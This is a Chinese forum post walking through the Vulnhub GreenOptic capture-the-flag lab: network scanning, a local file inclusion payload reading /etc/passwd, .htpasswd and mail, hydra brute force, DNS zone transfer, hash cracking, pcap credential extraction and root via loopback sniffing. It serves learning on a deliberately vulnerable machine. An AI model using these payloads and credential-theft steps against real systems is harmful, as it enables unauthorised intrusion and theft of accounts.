ToB企服应用市场:ToB评测及商务社交产业平台

标题: Vulnhub之GreenOptics靶机详细测试过程 [打印本页]

---

作者: 惊落一身雪    时间: 2023-4-29 21:43
标题: Vulnhub之GreenOptics靶机详细测试过程
GreenOptics

识别目标主机IP地址

1. ─(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
4.                                                                                                                            
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
10. 192.168.56.100  08:00:27:2b:10:e6      1      60  PCS Systemtechnik GmbH                                                   
11. 192.168.56.254  08:00:27:31:b2:9c      1      60  PCS Systemtechnik GmbH      

复制代码

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描

1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-28 20:25 EDT
4. Nmap scan report for inplainsight (192.168.56.254)
5. Host is up (0.00039s latency).
6. Not shown: 65377 filtered tcp ports (no-response), 153 filtered tcp ports (host-prohibited)
7. PORT      STATE SERVICE VERSION
8. 21/tcp    open  ftp     vsftpd 3.0.2
9. 22/tcp    open  ssh     OpenSSH 7.4 (protocol 2.0)
10. | ssh-hostkey:
11. |   2048 462032edf07411edfda7a417abf6f021 (RSA)
12. |   256 b6fb6410390ef9be8b5ad0d2413e6768 (ECDSA)
13. |_  256 24270bc9355f277e1a8273e069cc0f96 (ED25519)
14. 53/tcp    open  domain  ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7)
15. | dns-nsid:
16. |_  bind.version: 9.11.4-P2-RedHat-9.11.4-16.P2.el7_8.6
17. 80/tcp    open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
18. | http-methods:
19. |_  Potentially risky methods: TRACE
20. |_http-title: GreenOptic
21. |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
22. 10000/tcp open  http    MiniServ 1.953 (Webmin httpd)
23. |_http-title: Site doesn't have a title (text/html; Charset=utf-8).
24. |_http-server-header: MiniServ/1.953
25. MAC Address: 08:00:27:31:B2:9C (Oracle VirtualBox virtual NIC)
26. Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7
28. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
29. Nmap done: 1 IP address (1 host up) scanned in 184.73 seconds

复制代码

NMAP扫描结果表明目标主机有5个开放端口：21（ftp)、22(ssh)、53(dns)、80(http)、10000（http)
获得Shell

1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ curl http://192.168.56.254:10000/                                                            
3. <h1>Error - Document follows</h1>
4. <p>This web server is running in SSL mode. Try the URL <a target="_blank" href='https://websrv01.greenoptic.vm:10000/'>https://websrv01.greenoptic.vm:10000/</a> instead.</p>

复制代码

说明需要添加主机记录到/etc/hosts文件：

1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ sudo vim /etc/hosts                                       
3. [sudo] password for kali:
4.                                                                                                                               
5. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
6. └─$ cat /etc/hosts                  
7. 127.0.0.1       localhost
8. 127.0.1.1       kali
9. ::1             localhost ip6-localhost ip6-loopback
10. ff02::1         ip6-allnodes
11. ff02::2         ip6-allrouters
12. 192.168.56.254  websrv01.greenoptic.vm

复制代码

再次访问：

1. https://websrv01.greenoptic.vm:10000/

复制代码

返回页面为用户登录界面,10000端口的信息收集暂时告一段落。

1. ──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ nikto -h http://192.168.56.254                                                                     
3. - Nikto v2.1.6
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.56.254
6. + Target Hostname:    192.168.56.254
7. + Target Port:        80
8. + Start Time:         2023-04-28 20:35:07 (GMT-4)
9. ---------------------------------------------------------------------------
10. + Server: Apache/2.4.6 (CentOS) PHP/5.4.16
11. + The anti-clickjacking X-Frame-Options header is not present.
12. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
14. + PHP/5.4.16 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
15. + Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
16. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
17. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
18. + Retrieved x-powered-by header: PHP/5.4.16
19. + OSVDB-3268: /css/: Directory indexing found.
20. + OSVDB-3092: /css/: This might be interesting...
21. + OSVDB-3268: /img/: Directory indexing found.
22. + OSVDB-3092: /img/: This might be interesting...
23. + OSVDB-3268: /icons/: Directory indexing found.
24. + OSVDB-3092: /LICENSE.txt: License file found may identify site software.
25. + OSVDB-3233: /icons/README: Apache default file found.
26. + 8724 requests: 0 error(s) and 15 item(s) reported on remote host
27. + End Time:           2023-04-28 20:36:00 (GMT-4) (53 seconds)
28. ---------------------------------------------------------------------------
29. + 1 host(s) tested

复制代码

nikto没有得到80端口有价值的信息。

1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
3. ===============================================================
4. Gobuster v3.3
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.254
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.3
13. [+] Extensions:              txt,sh,php,js,html
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/04/28 20:39:13 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /index.html           (Status: 200) [Size: 17119]
19. /.html                (Status: 403) [Size: 207]
20. /img                  (Status: 301) [Size: 234] [--> http://192.168.56.254/img/]
21. /account              (Status: 301) [Size: 238] [--> http://192.168.56.254/account/]
22. /css                  (Status: 301) [Size: 234] [--> http://192.168.56.254/css/]
23. /js                   (Status: 301) [Size: 233] [--> http://192.168.56.254/js/]
24. /LICENSE.txt          (Status: 200) [Size: 17128]
25. /statement.html       (Status: 200) [Size: 6687]
26. /.html                (Status: 403) [Size: 207]
27. Progress: 1321725 / 1323366 (99.88%)===============================================================
28. 2023/04/28 20:41:18 Finished
29. ===============================================================
30.                                                                

复制代码

访问/account，返回是另一个用户登录。

1. http://192.168.56.254/account/index.php?include=cookiewarning

复制代码

但是注意到URL,此处可能存在本地文件包含漏洞。

1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ curl http://192.168.56.254/account/index.php?include=../../../../etc/passwd      
3. <!DOCTYPE html>
4. <html lang="en">
6. root:x:0:0:root:/root:/bin/bash
7. bin:x:1:1:bin:/bin:/sbin/nologin
8. daemon:x:2:2:daemon:/sbin:/sbin/nologin
9. adm:x:3:4:adm:/var/adm:/sbin/nologin
10. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
11. sync:x:5:0:sync:/sbin:/bin/sync
12. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
13. halt:x:7:0:halt:/sbin:/sbin/halt
14. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
15. operator:x:11:0:operator:/root:/sbin/nologin
16. games:x:12:100:games:/usr/games:/sbin/nologin
17. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
18. nobody:x:99:99:Nobody:/:/sbin/nologin
19. systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
20. dbus:x:81:81:System message bus:/:/sbin/nologin
21. polkitd:x:999:998:User for polkitd:/:/sbin/nologin
22. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
23. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
24. chrony:x:998:996::/var/lib/chrony:/sbin/nologin
25. apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
26. mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
27. tcpdump:x:72:72::/:/sbin/nologin
28. sam:x:1000:1000::/home/sam:/bin/bash
29. terry:x:1001:1001::/home/terry:/bin/bash
30. named:x:25:25:Named:/var/named:/sbin/nologin
31. alex:x:1002:1002::/home/alex:/bin/bash
32. dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
33. dovenull:x:997:993:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
34. monitor:x:1003:1003::/home/monitor:/bin/bash
35. saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
37. </body>
38. </html>

复制代码

经过测试，目标页面确实存在本地文件包含漏洞，那接下来的任务就是如何利用该漏洞获得shell了
在Kali Linux上本地启动http.server（可以任意创建一个文本文件用于测试），然后访问以下URL:

1. http://192.168.56.254/account/index.php?include=http://192.168.56.206:8000/test.txt

复制代码

从结果来看目标主机不存在远程文件包含漏洞，接下来看是否可以获取用户SSH私钥文件。
逐一测试各个用户（sam, terry, alex, monitor)家目录下/.ssh/id_rsa文件是否存在，如：

1. http://192.168.56.254/account/index.php?include=../../../../home/monitor/.ssh/id_rsa

复制代码

经过测试没有获取任何SSH私钥文件。
接下来看是否可以破解这些用户的FTP密码
将所有普通用户生成用户字典：

1. ──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ cat user.dict                                                              
3. sam
4. terry
5. alex
6. monitor

复制代码

1. ──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ hydra -L user.dict -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.254  -f
3. Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
5. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-28 21:56:28
6. [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
7. [DATA] max 16 tasks per 1 server, overall 16 tasks, 57377596 login tries (l:4/p:14344399), ~3586100 tries per task
8. [DATA] attacking ftp://192.168.56.254:21/

复制代码

没有破解出密码。
因为作者给出明显的提示，域名是websrv01.greenoptic.vm，除了websrv01有其他子域名

1. ──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ dig @192.168.56.254 greenoptic.vm axfr
4. ; <<>> DiG 9.18.8-1-Debian <<>> @192.168.56.254 greenoptic.vm axfr
5. ; (1 server found)
6. ;; global options: +cmd
7. greenoptic.vm.          3600    IN      SOA     websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
8. greenoptic.vm.          3600    IN      NS      ns1.greenoptic.vm.
9. ns1.greenoptic.vm.      3600    IN      A       127.0.0.1
10. recoveryplan.greenoptic.vm. 3600 IN     A       127.0.0.1
11. websrv01.greenoptic.vm. 3600    IN      A       127.0.0.1
12. greenoptic.vm.          3600    IN      SOA     websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
13. ;; Query time: 4 msec
14. ;; SERVER: 192.168.56.254#53(192.168.56.254) (TCP)
15. ;; WHEN: Fri Apr 28 22:12:31 EDT 2023
16. ;; XFR size: 6 records (messages 1, bytes 235)

复制代码

利用dig工具发现了recoveryplan子域名，将该子域名添加到/etc/hosts文件中：

1. ──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ sudo vim /etc/hosts                                       
3. [sudo] password for kali:
4.                                                                                                                               
5. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
6. └─$ cat /etc/hosts
7. 127.0.0.1       localhost
8. 127.0.1.1       kali
9. ::1             localhost ip6-localhost ip6-loopback
10. ff02::1         ip6-allnodes
11. ff02::2         ip6-allrouters
12. 192.168.56.254  websrv01.greenoptic.vm
13. 192.168.56.254  recoveryplan.greenoptic.vm

复制代码

访问该子域名，需要网页基本认证，尝试一些弱口令失败，因为基本认证的用户名和密码存在.htpasswd文件中，看能否获取该文件内容

1. (kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ curl http://192.168.56.254/account/index.php?include=../../../../../var/www/.htpasswdstaff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.
4. </body>
5. </html>

复制代码

将密码破解：

1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
3. Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
4. Use the "--format=md5crypt-long" option to force loading these as that type instead
5. Using default input encoding: UTF-8
6. Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
7. Will run 2 OpenMP threads
8. Press 'q' or Ctrl-C to abort, almost any other key for status
9. wheeler          (?)     
10. 1g 0:00:00:00 DONE (2023-04-29 04:29) 9.090g/s 120436p/s 120436c/s 120436C/s guess1..lorena1
11. Use the "--show" option to display all of the cracked passwords reliably
12. Session completed.

复制代码

用上述用户名和密码访问
<img alt="" loading="lazy">
该帖子中有一个dpi.zip文件，将其下载到Kali Linux本地，而且提到：have e-mailed you the password，因此再用前面的本地文件包含漏洞读取邮件（发给sam的邮件）：

1. http://192.168.56.254/account/index.php?include=../../../../../var/mail/sam

复制代码

1. From terry@greenoptic.vm  Sun Jul 12 16:13:45 2020
2. Return-Path: <terry@greenoptic.vm>
3. X-Original-To: sam
4. Delivered-To: sam@websrv01.greenoptic.vm
5. Received: from localhost (localhost [IPv6:::1])
6.         by websrv01.greenoptic.vm (Postfix) with ESMTP id A8D371090085
7.         for <sam>; Sun, 12 Jul 2020 16:13:18 +0100 (BST)
8. Message-Id: <20200712151322.A8D371090085@websrv01.greenoptic.vm>
9. Date: Sun, 12 Jul 2020 16:13:18 +0100 (BST)
10. From: terry@greenoptic.vm
12. Hi Sam, per the team message, the password is HelloSunshine123

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ unzip dpi.zip      
3. Archive:  dpi.zip
4. [dpi.zip] dpi.pcap password:
5.   inflating: dpi.pcap               
6.                                                                                                                               
7. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
8. └─$ ls -alh
9. total 148M
10. drwxr-xr-x   2 kali kali 4.0K Apr 29 04:36 .
11. drwxr-xr-x 121 kali kali 4.0K Apr 28 20:24 ..
12. -rw-r--r--   1 kali kali 332K Jul 12  2020 dpi.pcap
13. -rw-r--r--   1 kali kali  71K Apr 29 04:35 dpi.zip
14. -rw-r--r--   1 kali kali   38 Apr 29 04:29 hash
15. -rw-r--r--   1 kali kali 148M Apr 28 22:10 hydra.restore
16. -rw-r--r--   1 root root 1.4K Apr 28 20:28 nmap_full_scan
17. -rw-r--r--   1 kali kali   12 Apr 28 21:10 test.txt
18. -rw-r--r--   1 kali kali   23 Apr 28 21:16 user.dict

复制代码

用上面本地文件包含漏洞读取到的密码解压缩dpi.zip文件，得到dpi.pcap
利用wireshark工具打开pcap文件，可以看到ftp的用户名和密码：
<img alt="" loading="lazy">
用户名：alex
密码： FwejAASD1
登录FTP服务：

1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ ftp 192.168.56.254
3. Connected to 192.168.56.254.
4. 220 (vsFTPd 3.0.2)
5. Name (192.168.56.254:kali): alex
6. 331 Please specify the password.
7. Password:
8. 230 Login successful.
9. Remote system type is UNIX.
10. Using binary mode to transfer files.
11. ftp> ls -alh
12. 229 Entering Extended Passive Mode (|||28596|).
13. ftp: Can't connect to `192.168.56.254:28596': No route to host
14. 200 EPRT command successful. Consider using EPSV.
15. 150 Here comes the directory listing.
16. drwx------    3 1002     1002          136 Jul 12  2020 .
17. drwxr-xr-x    6 0        0              57 Jul 12  2020 ..
18. -rw-------    1 1002     1002          100 Jul 12  2020 .Xauthority
19. lrwxrwxrwx    1 0        0               9 Jul 12  2020 .bash_history -> /dev/null
20. -rw-r--r--    1 1002     1002           18 Apr 01  2020 .bash_logout
21. -rw-r--r--    1 1002     1002          193 Apr 01  2020 .bash_profile
22. -rw-r--r--    1 1002     1002          231 Apr 01  2020 .bashrc
23. drwxr-xr-x    2 1002     1002           41 Jul 12  2020 .wireshark
24. -rwx------    1 1002     1002           70 Jul 12  2020 user.txt
25. 226 Directory send OK.
26. ftp> get user.txt
27. local: user.txt remote: user.txt
28. 200 EPRT command successful. Consider using EPSV.
29. 150 Opening BINARY mode data connection for user.txt (70 bytes).
30. 100% |*********************************************************************************|    70       77.50 KiB/s    00:00 ETA
31. 226 Transfer complete.
32. 70 bytes received in 00:00 (54.73 KiB/s)
33. ftp> pwd
34. Remote directory: /home/alex

复制代码

用相同的用户名和密码登录SSH：

1. ──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ ssh alex@192.168.56.254                                       
3. The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
4. ED25519 key fingerprint is SHA256:FkUejrDoIcwfG8KzsYAElBrX2BbWcAHiVWnR8k0k0Kk.
5. This key is not known by any other names.
6. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
7. Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
8. alex@192.168.56.254's password:
9. [alex@websrv01 ~]$ ls -alh
10. total 20K
11. drwx------. 3 alex alex 136 Jul 12  2020 .
12. drwxr-xr-x. 6 root root  57 Jul 12  2020 ..
13. lrwxrwxrwx. 1 root root   9 Jul 12  2020 .bash_history -> /dev/null
14. -rw-r--r--. 1 alex alex  18 Apr  1  2020 .bash_logout
15. -rw-r--r--. 1 alex alex 193 Apr  1  2020 .bash_profile
16. -rw-r--r--. 1 alex alex 231 Apr  1  2020 .bashrc
17. -rwx------. 1 alex alex  70 Jul 12  2020 user.txt
18. drwxr-xr-x. 2 alex alex  41 Jul 12  2020 .wireshark
19. -rw-------. 1 alex alex 100 Jul 12  2020 .Xauthority
20. [alex@websrv01 ~]$ cd ..
21. [alex@websrv01 home]$ ls -alh
22. total 0
23. drwxr-xr-x.  6 root    root     57 Jul 12  2020 .
24. dr-xr-xr-x. 17 root    root    244 Jul 13  2020 ..
25. drwx------.  3 alex    alex    136 Jul 12  2020 alex
26. drwx------.  2 monitor monitor  62 Jul 12  2020 monitor
27. drwx------.  2 sam     sam      62 Jul 12  2020 sam
28. drwx------.  2 terry   terry    83 Jul 12  2020 terry
29. [alex@websrv01 home]$

复制代码

提权

1. [alex@websrv01 home]$ id
2. uid=1002(alex) gid=1002(alex) groups=1002(alex),994(wireshark)

复制代码

发现id隶属于wireshark组，这样alex可以运行wireshark命令行工具dumpcap,即
用dumpcap工具抓包，抓本地环回接口的包，然后将其下载到Kali LInux本地，
利用wireshar k打开：

1. AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=

复制代码

将其base64解码：

1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
2. └─$ echo 'AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=' | base64 -d
3. rootASfojoj2eozxczzmedlmedASASDKoj3o

复制代码

root密码为ASfojoj2eozxczzmedlmedASASDKoj3o：

1. [root@websrv01 ~]# ls -alh
2. total 60K
3. dr-xr-x---.  5 root root 4.0K Jul 13  2020 .
4. dr-xr-xr-x. 17 root root  244 Jul 13  2020 ..
5. -rw-------.  1 root root 1.3K Jul 12  2020 anaconda-ks.cfg
6. lrwxrwxrwx.  1 root root    9 Jul 12  2020 .bash_history -> /dev/null
7. -rw-r--r--.  1 root root   18 Dec 29  2013 .bash_logout
8. -rw-r--r--.  1 root root  176 Dec 29  2013 .bash_profile
9. -rw-r--r--.  1 root root  176 Dec 29  2013 .bashrc
10. -rw-r--r--.  1 root root  100 Dec 29  2013 .cshrc
11. drwx------.  2 root root   99 Jul 12  2020 .gnupg
12. -rw-------.  1 root root   45 Jul 12  2020 .lesshst
13. -rw-r--r--.  1 root root   32 Jul 12  2020 .monit.id
14. -rw-------.  1 root root  800 Apr 29 03:22 .monit.state
15. drwxr-----.  3 root root   19 Jul 12  2020 .pki
16. -rw-------.  1 root root 1.0K Jul 12  2020 .rnd
17. -rwx------.  1 root root  837 Jul 12  2020 root.txt
18. -rw-r--r--.  1 root root  129 Dec 29  2013 .tcshrc
19. -rw-------   1 root root 5.7K Jul 13  2020 .viminfo
20. drwxr-xr-x.  2 root root   41 Jul 12  2020 .wireshark
21. -rw-------.  1 root root   50 Jul 12  2020 .Xauthority
22. [root@websrv01 ~]# cat root.txt
23. Congratulations on getting root!
25.   ____                      ___        _   _      
26. / ___|_ __ ___  ___ _ __  / _ \ _ __ | |_(_) ___
27. | |  _| '__/ _ \/ _ \ '_ \| | | | '_ \| __| |/ __|
28. | |_| | | |  __/  __/ | | | |_| | |_) | |_| | (__
29. \____|_|  \___|\___|_| |_|\___/| .__/ \__|_|\___|
30.                                 |_|            
31.   
32. You've overcome a series of difficult challenges, so well done!
34. I'm happy to make my CTFs available for free. If you enjoyed doing the CTF, please leave a comment on my blog at https://security.caerdydd.wales - I will be happy for your feedback so I can improve them and make them more enjoyable in the future.
36. *********
37. Kindly place your vote on the poll located here to let me know how difficult you found it: https://security.caerdydd.wales/greenoptic-ctf/
38. *********
40. Thanks,
41. bootlesshacker
42. [root@websrv01 ~]#

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4